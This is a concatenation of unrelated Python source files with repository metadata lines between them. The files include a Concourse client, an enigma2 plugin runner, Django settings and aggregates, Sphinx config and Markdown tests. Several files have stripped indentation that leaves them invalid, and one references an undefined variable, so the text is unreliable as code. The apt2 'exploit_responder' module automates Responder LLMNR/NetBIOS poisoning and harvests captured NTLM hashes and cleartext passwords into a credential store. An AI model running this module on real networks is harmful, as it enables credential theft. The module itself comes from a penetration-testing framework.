        elif isinstance(records, (int, long)):
            self.client.setKeyValueRecord(key, value, records, self.creds, self.transaction, self.environment)
        else:
            require_kwarg('record or records')
    def stage(self):
        """ Start a new transaction on the server and remember its token.

        The stored token is passed along with every subsequent operation so
        that they execute inside the transaction.
        """
        self.transaction = self.client.stage(self.creds, self.environment)
def time(self, phrase=None):
"""
:param phrase:
:return:
"""
if phrase:
return self.client.timePhrase(phrase, self.creds, self.transaction, self.environment)
else:
return self.client.time(self.creds, self.transaction, self.environment)
def unlink(self, key, source, destinations=None, **kwargs):
"""
:param key:
:param source:
:param destination:
:return:
"""
destinations = destinations or kwargs.get('destination')
if not isinstance(destinations, list):
return self.remove(key=key, value=Link.to(destinations), record=source)
else:
data = dict()
for dest in destinations:
data[dest] = self.remove(key, Link.to(dest), source)
return data
    def verify(self, key, value, record, timestamp=None, **kwargs):
        """ Verify that *value* is stored for *key* in *record*, optionally
        at a historical timestamp.

        :param key: the field name
        :param value: the value to check for (converted to its thrift form)
        :param record: the record id
        :param timestamp: an optional point in time, either a numeric value
            or a natural-language string (alias kwarg: 'timestamp')
        :return: the server's verification result
        """
        value = python_to_thrift(value)
        timestamp = timestamp or find_in_kwargs_by_alias('timestamp', kwargs)
        timestr = isinstance(timestamp, basestring)
        if not timestamp:
            return self.client.verifyKeyValueRecord(key, value, record, self.creds, self.transaction, self.environment)
        elif timestamp and not timestr:
            return self.client.verifyKeyValueRecordTime(key, value, record, timestamp, self.creds, self.transaction,
                                                        self.environment)
        elif timestamp and timestr:
            return self.client.verifyKeyValueRecordTimestr(key, value, record, timestamp, self.creds, self.transaction,
                                                           self.environment)
def verify_and_swap(self, key=None, expected=None, record=None, replacement=None, **kwargs):
"""
:param key:
:param expected:
:param record:
:param replacement:
:return:
"""
expected = expected or find_in_kwargs_by_alias('expected', **kwargs)
replacement = replacement or find_in_kwargs_by_alias('replacement', **kwargs)
expected = python_to_thrift(expected)
replacement = python_to_thrift(replacement)
if key and expected and record and replacement:
return self.client.verifyAndSwap(key, expected, record, replacement, self.creds, self.transaction,
self.environment)
else:
require_kwarg('key, expected, record and replacement')
def verify_or_set(self, key, value, record):
"""
:param key:
:param value:
:param record:
:return:
"""
value = python_to_thrift(value)
return self.client.verifyOrSet(key, value, record, self.creds, self.transaction, self.environment)
| apache-2.0 |
OpenSPA/dvbapp | lib/python/Plugins/Extensions/TuxboxPlugins/pluginrunner.py | 33 | 1173 | from enigma import eDBoxLCD, eRCInput, fbClass, eConsoleAppContainer
from Screens.Screen import Screen
from Screens.MessageBox import MessageBox
class PluginRunner(Screen):
skin = """
<screen position="1,1" size="1,1" title="Plugin" >
</screen>"""
def __init__(self, session, pluginname, args = None):
self.skin = PluginRunner.skin
Screen.__init__(self, session)
self.container = eConsoleAppContainer()
self.container.appClosed.append(self.finishedExecution)
self.runPlugin(pluginname)
def runPlugin(self, pluginname):
eDBoxLCD.getInstance().lock()
eRCInput.getInstance().lock()
fbClass.getInstance().lock()
print "executing:", ("pluginlauncher -x %s" % pluginname)
if self.container.execute("pluginlauncher -x %s" % pluginname):
self.finishedExecution(None)
def finishedExecution(self, retval = 1):
print "PluginRunner retval:", retval
fbClass.getInstance().unlock()
eRCInput.getInstance().unlock()
eDBoxLCD.getInstance().unlock()
if retval is None or retval != 1:
self.session.openWithCallback(
self.finishedExecution,
MessageBox,
_("Error executing plugin") % (param)
)
else:
self.close()
| gpl-2.0 |
dymkowsk/mantid | Testing/SystemTests/tests/analysis/ReflectometryQuickPointDetector.py | 3 | 1181 | #pylint: disable=no-init
import stresstesting
from mantid.simpleapi import *
from isis_reflectometry import quick
class ReflectometryQuickPointDetector(stresstesting.MantidStressTest):
    """
    This is a system test for the top-level quick routines. Quick is the name given to the
    ISIS reflectometry reduction scripts. Uses the point detector functionality with real transmission corrections.
    """
    def runTest(self):
        # Temporarily force the default instrument to INTER; the original
        # value is restored in the finally block so other tests are not
        # affected even when the reduction raises.
        defaultInstKey = 'default.instrument'
        defaultInstrument = config[defaultInstKey]
        try:
            config[defaultInstKey] = 'INTER'
            # Load the two transmission runs and the run to be reduced.
            LoadISISNexus(Filename='13463', OutputWorkspace='13463')
            LoadISISNexus(Filename='13464', OutputWorkspace='13464')
            LoadISISNexus(Filename='13460', OutputWorkspace='13460')
            transmissionRuns = '13463,13464'
            runNo = '13460'
            incidentAngle = 0.7
            # Run the quick reduction with real transmission corrections.
            quick.quick(runNo, trans=transmissionRuns, theta=incidentAngle)
        finally:
            config[defaultInstKey] = defaultInstrument
    def validate(self):
        # Instrument definitions drift over time, so exclude them from the
        # workspace comparison against the reference file.
        self.disableChecking.append('Instrument')
        return '13460_IvsQ','QuickReferenceResult.nxs'
MooseDojo/apt2 | modules/action/exploit_responder.py | 1 | 3558 | import datetime
import os
from core.actionModule import actionModule
from core.utils import Utils
from core.keystore import KeyStore as kb
class exploit_responder(actionModule):
    """ Action module that launches Responder to poison NetBIOS/LLMNR name
    resolution and harvests any captured credentials/hashes into the
    knowledge base. """

    def __init__(self, config, display, lock):
        super(exploit_responder, self).__init__(config, display, lock)
        self.title = "Run Responder and watch for hashes"
        self.shortName = "Responder"
        # BUGFIX: the description previously misspelled "responder".
        self.description = "execute [responder -I eth0 -wrf]"
        self.requirements = ["sqlite3", "responder"]
        self.triggers = ["always"]
        self.types = ["mitm"]
        self.safeLevel = 3
        self.maxThreads = 1

    def process(self):
        default_interface = self.config["responder_iface"]
        default_delay = self.config["responder_delay"]
        my_ip = self.config["lhost"]
        # TODO: if no creds were captured, wait 5 minutes and run again for
        # another window, repeating a few times before giving up.
        found_hash = False
        times_run = 0
        self.display.output("Starting responder...")
        temp_file1 = self.config["proofsDir"] + self.shortName + "_" + Utils.getRandStr(10)
        temp_file2 = self.config["proofsDir"] + self.shortName + "_" + Utils.getRandStr(10)
        command = "python " + self.config["responder"] + " -I " + default_interface + " -i " + my_ip + " -wrf"
        # Run Responder for the configured timeout, then query its sqlite DB
        # for entries recorded since we started (STDOUT proved unreliable, so
        # results are pulled straight from Responder.db).
        start_time = '{:%d-%m-%Y %H:%M:%S}'.format(datetime.datetime.now())
        result = Utils.execWait(command, temp_file1, timeout=int(self.config["responder_timeout"]))
        responder_path, temp1 = os.path.split(self.config["responder"])
        responder_db = responder_path + "/Responder.db"
        command = self.config["sqlite3"] + " " + responder_db + " \"select * from responder where timestamp > '" + start_time + "'\""
        result = Utils.execWait(command, temp_file2, timeout=10)
        times_run += 1
        # Responder only creates the table once it has results, so a missing
        # table simply means nothing was captured.
        if not "no such table" in result:
            for part in result.splitlines():
                found_hash = True
                record = part.split('|')
                if len(record) > 0:
                    # Column layout of Responder.db's "responder" table
                    # (assumed from usage): 1=method, 2=hash type, 3=host,
                    # 5=DOMAIN\\user, 6=cleartext, 7=short hash, 8=full hash.
                    # TODO confirm against the Responder schema.
                    method = record[1]
                    hashtype = record[2]
                    # BUGFIX: removed a leftover debug print of the hash type.
                    host = record[3]
                    username = record[5]
                    domain = username.split('\\')[0]
                    user = username.split('\\')[1]
                    cleartext = record[6]
                    shorthash = record[7]
                    fullhash = record[8]
                    self.display.error("Vuln [NetBIOS|LLMNR] Found new hash - ", fullhash)
                    self.addVuln(host, "NetBIOS|LLMNR", {"port": "445", "output": temp_file2.replace("/", "%2F")})
                    kb.add("creds/domain/" + domain + "/username/" + user + "/" + hashtype + "/" + fullhash)
                    if len(cleartext) > 0:
                        kb.add("creds/host/" + host + "/username/" + user + "/password/" + cleartext)
        if found_hash:
            self.fire("newNTLMHash")
        return
| mit |
CARocha/plataforma_fadcanic | plataforma_fadcanic/settings.py | 3 | 5677 | # -*- coding: utf-8 -*-
from local_settings import *
# Application definition
INSTALLED_APPS = (
    'bootstrap_admin',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django.contrib.flatpages',
    # "Cambia Ahora" site apps: news, stories, multimedia, staff,
    # testimonials and site configuration.
    'cambiaahora.noticias',
    'cambiaahora.historias',
    'cambiaahora.multimedias',
    'cambiaahora.staff',
    'cambiaahora.testimonios',
    'cambiaahora.configuracion',
    # Activity-tracking apps.
    'actividades.contraparte',
    'actividades.fadcanic',
    'actividades.lugar',
    'actividades.clippy',
    # Monitoring (currently disabled).
    #'monitoreo.comunidad',
    # CAPS youth-violence app.
    'violencia_juvenil',
    # Actor-mapping app.
    'mapeo',
    # Library app.
    'biblioteca',
    # Third-party apps.
    'ckeditor',
    'smart_selects',
    'sorl.thumbnail',
    'embed_video',
    'endless_pagination',
    'multiselectfield',
    'rest_framework',
    'import_export',
)
# Request/response middleware; applied in order for requests and in reverse
# order for responses.
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.locale.LocaleMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    # Serves flatpages for URLs that would otherwise 404.
    'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',
)
ROOT_URLCONF = 'plataforma_fadcanic.urls'
SITE_ID = 1
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.contrib.auth.context_processors.auth',
                'django.template.context_processors.debug',
                'django.template.context_processors.i18n',
                'django.template.context_processors.media',
                'django.template.context_processors.static',
                'django.template.context_processors.tz',
                'django.contrib.messages.context_processors.messages',
                'django.template.context_processors.request',
                # Project-wide template variables.
                'plataforma_fadcanic.context.globales',
            ],
        },
    },
]
# Legacy (pre-1.8 style) context-processor setting, extended in place.
# NOTE(review): kept alongside TEMPLATES above, presumably for code that
# still reads the old setting — TODO confirm it is still needed.
from django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS
TEMPLATE_CONTEXT_PROCESSORS += (
    'django.core.context_processors.request',
)
ENDLESS_PAGINATION_PER_PAGE = 6
WSGI_APPLICATION = 'plataforma_fadcanic.wsgi.application'
BOOTSTRAP_ADMIN_SIDEBAR_MENU = True
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'es'
LANGUAGES = (
    ('es', 'Español'),
    ('en', 'English'),
)
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
# NOTE(review): USE_TZ is disabled, so datetimes are stored naive even though
# TIME_ZONE is 'UTC' — confirm this is intentional before changing it.
USE_TZ = False
LOCALE_PATHS = (
    os.path.join(BASE_DIR, 'locale'),
)
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
# Media/static roots default to in-project directories but can be overridden
# via environment variables for deployment.
MEDIA_ROOT = os.environ.get('MEDIA_ROOT', os.path.join(BASE_DIR, 'media'))
MEDIA_URL = '/media/'
STATIC_ROOT = os.environ.get('STATIC_ROOT', os.path.join(BASE_DIR, 'static'))
STATIC_URL = '/static/'
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, "static_media"),
)
#ckeditor
CKEDITOR_CONFIGS = {
'default': {
'extraPlugins': 'image2',
'toolbar': [
{ 'name': 'document', 'groups': [ 'mode', 'document', 'doctools' ], 'items': [ 'Source', '-', 'Save', 'NewPage', 'Preview', 'Print', '-', 'Templates' ] },
{ 'name': 'clipboard', 'groups': [ 'clipboard', 'undo' ], 'items': [ 'Cut', 'Copy', 'Paste', 'PasteText', 'PasteFromWord', '-', 'Undo', 'Redo' ] },
{ 'name': 'editing', 'groups': [ 'find', 'selection', 'spellchecker' ], 'items': [ 'Find', 'Replace', '-', 'SelectAll', '-', 'Scayt' ] },
#{ 'name': 'forms', 'items': [ 'Form', 'Checkbox', 'Radio', 'TextField', 'Textarea', 'Select', 'Button', 'ImageButton', 'HiddenField' ] },
'/',
{ 'name': 'basicstyles', 'groups': [ 'basicstyles', 'cleanup' ], 'items': [ 'Bold', 'Italic', 'Underline', 'Strike', 'Subscript', 'Superscript', '-', 'RemoveFormat' ] },
{ 'name': 'paragraph', 'groups': [ 'list', 'indent', 'blocks', 'align', 'bidi' ], 'items': [ 'NumberedList', 'BulletedList', '-', 'Outdent', 'Indent', '-', 'Blockquote', 'CreateDiv', '-', 'JustifyLeft', 'JustifyCenter', 'JustifyRight', 'JustifyBlock', '-', 'BidiLtr', 'BidiRtl', 'Language' ] },
{ 'name': 'links', 'items': [ 'Link', 'Unlink', 'Anchor' ] },
{ 'name': 'insert', 'items': [ 'Image', 'Youtube', 'Flash', 'Table', 'HorizontalRule', 'Smiley', 'SpecialChar', 'PageBreak', 'Iframe' ] },
'/',
{ 'name': 'styles', 'items': [ 'Styles', 'Format', 'Font', 'FontSize' ] },
{ 'name': 'colors', 'items': [ 'TextColor', 'BGColor' ] },
{ 'name': 'tools', 'items': [ 'Maximize', 'ShowBlocks', ] },
],
'height': 'auto',
'width': 'auto',
},
}
CKEDITOR_UPLOAD_PATH = "uploads/"
CKEDITOR_IMAGE_BACKEND = "pillow"
CKEDITOR_JQUERY_URL = '//ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js'
EXPORT_SERVER = ''
SITE_ID = 1
LOGIN_URL = '/login/'
LOGIN_REDIRECT_URL = '/actividades/'
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
],
'PAGE_SIZE': 10
}
| mit |
gfreed/android_external_chromium-org | third_party/bintrees/bintrees/treeslice.py | 156 | 1950 | #!/usr/bin/env python
#coding:utf-8
# Author: mozman -- <mozman@gmx.at>
# Purpose: TreeSlice
# Created: 11.04.2011
# Copyright (c) 2010-2013 by Manfred Moitzi
# License: MIT License
class TreeSlice(object):
    ''' A read-only view onto the half-open key interval [start, stop) of a
        tree. A bound of None leaves that side of the interval open. Slicing
        a TreeSlice produces another TreeSlice covering the intersection of
        the two intervals.
    '''
    __slots__ = ['_tree', '_start', '_stop']

    def __init__(self, tree, start, stop):
        self._tree = tree
        self._start = start
        self._stop = stop

    def __repr__(self):
        # Render like "TreeClassName({k1: v1, k2: v2})"
        pairs = ", ".join("%r: %r" % pair for pair in self.items())
        return "%s({%s})" % (self._tree.__class__.__name__, pairs)

    def __contains__(self, key):
        # Keys outside the interval are never contained, even if the
        # underlying tree has them.
        return self._inrange(key) and key in self._tree

    def _inrange(self, key):
        # True when `key` lies inside [start, stop); None bounds are open.
        lower, upper = self._start, self._stop
        if lower is not None and key < lower:
            return False
        return not (upper is not None and key >= upper)

    def __getitem__(self, key):
        if isinstance(key, slice):
            return self._subslice(key.start, key.stop)
        if not self._inrange(key):
            raise KeyError(key)
        return self._tree[key]

    def _subslice(self, start, stop):
        # Intersect the requested interval with this slice's own interval:
        # the new start is the larger lower bound, the new stop the smaller
        # upper bound (None meaning "unbounded" on that side).
        bounds = []
        for requested, current, tighter in (
                (start, self._start, max),
                (stop, self._stop, min)):
            if requested is None:
                bounds.append(current)
            elif current is None:
                bounds.append(requested)
            else:
                bounds.append(tighter(requested, current))
        return TreeSlice(self._tree, bounds[0], bounds[1])

    def keys(self):
        return self._tree.keyslice(self._start, self._stop)
    __iter__ = keys

    def values(self):
        return self._tree.valueslice(self._start, self._stop)

    def items(self):
        return self._tree.itemslice(self._start, self._stop)
| bsd-3-clause |
dixudx/rtcclient | doc/source/conf.py | 1 | 9623 | # -*- coding: utf-8 -*-
#
# rtcclient documentation build configuration file, created by
# sphinx-quickstart on Mon Aug 17 17:21:28 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# NOTE(review): 'shlex' is sphinx-quickstart boilerplate and appears unused in
# this file -- confirm before removing.

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# Make the rtcclient package importable for autodoc (docs live two levels
# below the repository root).
sys.path.insert(0, os.path.abspath('../..'))

# -- General configuration ------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.doctest',
    'sphinx.ext.intersphinx',
    'sphinx.ext.todo',
    'sphinx.ext.coverage',
    'sphinx.ext.ifconfig',
    'sphinx.ext.viewcode',
]

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'

# The encoding of source files.
# source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'rtcclient'
copyright = u'2015, Di Xu'
author = u'Di Xu'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# NOTE(review): keep `version` and `release` in sync when bumping the package.
version = '0.1.dev95'
# The full version, including alpha/beta/rc tags.
release = '0.1.dev95'

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'en'

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []

# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []

# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False

# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True

# -- Options for HTML output ----------------------------------------------

# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'

# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []

# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None

# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}

# If false, no module index is generated.
# html_domain_indices = True

# If false, no index is generated.
# html_use_index = True

# If true, the index is split into individual pages for each letter.
# html_split_index = False

# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None

# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
# html_search_language = 'en'

# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search_options = {'type': 'default'}

# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
# html_search_scorer = 'scorer.js'

# Output file base name for HTML help builder.
htmlhelp_basename = 'rtcclientdoc'

# -- Options for LaTeX output ---------------------------------------------

latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    # 'papersize': 'letterpaper',

    # The font size ('10pt', '11pt' or '12pt').
    # 'pointsize': '10pt',

    # Additional stuff for the LaTeX preamble.
    # 'preamble': '',

    # Latex figure (float) alignment
    # 'figure_align': 'htbp',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'rtcclient.tex', u'rtcclient Documentation',
     u'Di Xu', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False

# If true, show page references after internal links.
# latex_show_pagerefs = False

# If true, show URL addresses after external links.
# latex_show_urls = False

# Documents to append as an appendix to all manuals.
# latex_appendices = []

# If false, no module index is generated.
# latex_domain_indices = True

# -- Options for manual page output ---------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    (master_doc, 'rtcclient', u'rtcclient Documentation',
     [author], 1)
]

# If true, show URL addresses after external links.
# man_show_urls = False

# -- Options for Texinfo output -------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
    (master_doc, 'rtcclient', u'rtcclient Documentation',
     author, 'rtcclient', 'One line description of project.',
     'Miscellaneous'),
]

# Documents to append as an appendix to all manuals.
# texinfo_appendices = []

# If false, no module index is generated.
# texinfo_domain_indices = True

# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'

# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False

# Example configuration for intersphinx: refer to the Python standard library.
# NOTE(review): this is the legacy unnamed-key form; newer Sphinx prefers
# {'python': ('https://docs.python.org/', None)}.
intersphinx_mapping = {'https://docs.python.org/': None}
| apache-2.0 |
waylan/Python-Markdown | tests/test_syntax/inline/test_entities.py | 2 | 1625 | """
Python Markdown
A Python implementation of John Gruber's Markdown.
Documentation: https://python-markdown.github.io/
GitHub: https://github.com/Python-Markdown/markdown/
PyPI: https://pypi.org/project/Markdown/
Started by Manfred Stienstra (http://www.dwerg.net/).
Maintained for a few years by Yuri Takhteyev (http://www.freewisdom.org).
Currently maintained by Waylan Limberg (https://github.com/waylan),
Dmitry Shachnev (https://github.com/mitya57) and Isaac Muse (https://github.com/facelessuser).
Copyright 2007-2018 The Python Markdown Project (v. 1.7 and later)
Copyright 2004, 2005, 2006 Yuri Takhteyev (v. 0.2-1.6b)
Copyright 2004 Manfred Stienstra (the original version)
License: BSD (see LICENSE.md for details).
"""
from markdown.test_tools import TestCase
class TestEntities(TestCase):
    """Checks for HTML entity handling in inline Markdown text."""

    def test_named_entities(self):
        # Well-formed named entities pass through to the output unmodified.
        for source, expected in (
            ("&amp;", "<p>&amp;</p>"),
            ("&sup2;", "<p>&sup2;</p>"),
            ("&Aacute;", "<p>&Aacute;</p>"),
        ):
            self.assertMarkdownRenders(source, expected)

    def test_decimal_entities(self):
        # Decimal numeric character references are preserved as-is.
        for source, expected in (
            ("&#38;", "<p>&#38;</p>"),
            ("&#178;", "<p>&#178;</p>"),
        ):
            self.assertMarkdownRenders(source, expected)

    def test_hexadecimal_entities(self):
        # Hexadecimal numeric character references are preserved as-is.
        for source, expected in (
            ("&#x00026;", "<p>&#x00026;</p>"),
            ("&#xB2;", "<p>&#xB2;</p>"),
        ):
            self.assertMarkdownRenders(source, expected)

    def test_false_entities(self):
        # Malformed entities get their leading ampersand escaped instead.
        for source, expected in (
            ("&not an entity;", "<p>&amp;not an entity;</p>"),
            ("&#B2;", "<p>&amp;#B2;</p>"),
            ("&#xnothex;", "<p>&amp;#xnothex;</p>"),
        ):
            self.assertMarkdownRenders(source, expected)
| bsd-3-clause |
megaumi/django | django/db/models/sql/aggregates.py | 174 | 4843 | """
Classes to represent the default SQL aggregate functions
"""
import copy
import warnings
from django.db.models.fields import FloatField, IntegerField
from django.db.models.lookups import RegisterLookupMixin
from django.utils.deprecation import RemovedInDjango110Warning
from django.utils.functional import cached_property
# Public names re-exported by this deprecated compatibility module.
__all__ = ['Aggregate', 'Avg', 'Count', 'Max', 'Min', 'StdDev', 'Sum', 'Variance']

# Importing this module warns immediately: it only exists for backwards
# compatibility until its removal in Django 1.10.
warnings.warn(
    "django.db.models.sql.aggregates is deprecated. Use "
    "django.db.models.aggregates instead.",
    RemovedInDjango110Warning, stacklevel=2)
class Aggregate(RegisterLookupMixin):
    """
    Default SQL Aggregate.

    Subclasses set `sql_function` (and optionally `sql_template`,
    `is_ordinal`, `is_computed`) to describe how the aggregate renders to SQL
    and what Python type its result coerces to.
    """
    # True when the aggregate always yields an integer (e.g. COUNT).
    is_ordinal = False
    # True when the aggregate always yields a float (e.g. AVG).
    is_computed = False
    sql_template = '%(function)s(%(field)s)'

    def __init__(self, col, source=None, is_summary=False, **extra):
        """Instantiate an SQL aggregate

         * col is a column reference describing the subject field
           of the aggregate. It can be an alias, or a tuple describing
           a table and column name.
         * source is the underlying field or aggregate definition for
           the column reference. If the aggregate is not an ordinal or
           computed type, this reference is used to determine the coerced
           output type of the aggregate.
         * extra is a dictionary of additional data to provide for the
           aggregate definition

        Also utilizes the class variables:
         * sql_function, the name of the SQL function that implements the
           aggregate.
         * sql_template, a template string that is used to render the
           aggregate into SQL.
         * is_ordinal, a boolean indicating if the output of this aggregate
           is an integer (e.g., a count)
         * is_computed, a boolean indicating if this output of this aggregate
           is a computed float (e.g., an average), regardless of the input
           type.
        """
        self.col = col
        self.source = source
        self.is_summary = is_summary
        self.extra = extra

        # Follow the chain of aggregate sources back until you find an
        # actual field, or an aggregate that forces a particular output
        # type. This type of this field will be used to coerce values
        # retrieved from the database.
        tmp = self

        while tmp and isinstance(tmp, Aggregate):
            if getattr(tmp, 'is_ordinal', False):
                tmp = self._ordinal_aggregate_field
            elif getattr(tmp, 'is_computed', False):
                tmp = self._computed_aggregate_field
            else:
                # keep walking: an aggregate-of-aggregate defers to its source
                tmp = tmp.source

        self.field = tmp

    # Two fake fields used to identify aggregate types in data-conversion operations.
    @cached_property
    def _ordinal_aggregate_field(self):
        return IntegerField()

    @cached_property
    def _computed_aggregate_field(self):
        return FloatField()

    def relabeled_clone(self, change_map):
        # Return a shallow copy whose (table, column) reference is rewritten
        # according to `change_map` (used when query aliases are renamed).
        clone = copy.copy(self)
        if isinstance(self.col, (list, tuple)):
            clone.col = (change_map.get(self.col[0], self.col[0]), self.col[1])
        return clone

    def as_sql(self, compiler, connection):
        "Return the aggregate, rendered as SQL with parameters."
        params = []
        if hasattr(self.col, 'as_sql'):
            # col is itself an SQL-renderable expression
            field_name, params = self.col.as_sql(compiler, connection)
        elif isinstance(self.col, (list, tuple)):
            # (table, column) pair; `compiler` is used as a quoting callable
            # here (legacy interface) -- not the usual SQLCompiler object.
            field_name = '.'.join(compiler(c) for c in self.col)
        else:
            field_name = compiler(self.col)
        substitutions = {
            'function': self.sql_function,
            'field': field_name
        }
        # allow subclasses/callers to feed extra template parameters
        # (e.g. Count's %(distinct)s)
        substitutions.update(self.extra)
        return self.sql_template % substitutions, params

    def get_group_by_cols(self):
        # Aggregates never contribute columns to GROUP BY.
        return []

    @property
    def output_field(self):
        # Field (or fake field) describing the coerced output type.
        return self.field
class Avg(Aggregate):
    """SQL AVG(); result is always coerced to a float."""
    is_computed = True
    sql_function = 'AVG'
class Count(Aggregate):
    """SQL COUNT(), optionally COUNT(DISTINCT ...); result is an integer."""
    is_ordinal = True
    sql_function = 'COUNT'
    # the %(distinct)s placeholder is filled from the `extra` dict below
    sql_template = '%(function)s(%(distinct)s%(field)s)'

    def __init__(self, col, distinct=False, **extra):
        # Splice the DISTINCT qualifier (or nothing) in front of the column.
        distinct_prefix = 'DISTINCT ' if distinct else ''
        super(Count, self).__init__(col, distinct=distinct_prefix, **extra)
class Max(Aggregate):
    """SQL MAX(); result type matches the source field."""
    sql_function = 'MAX'
class Min(Aggregate):
    """SQL MIN(); result type matches the source field."""
    sql_function = 'MIN'
class StdDev(Aggregate):
    """SQL standard deviation; `sample` selects the sample (STDDEV_SAMP)
    rather than population (STDDEV_POP) variant. Result is a float."""
    is_computed = True

    def __init__(self, col, sample=False, **extra):
        super(StdDev, self).__init__(col, **extra)
        if sample:
            self.sql_function = 'STDDEV_SAMP'
        else:
            self.sql_function = 'STDDEV_POP'
class Sum(Aggregate):
    """SQL SUM(); result type matches the source field."""
    sql_function = 'SUM'
class Variance(Aggregate):
    """SQL variance; `sample` selects the sample (VAR_SAMP) rather than
    population (VAR_POP) variant. Result is a float."""
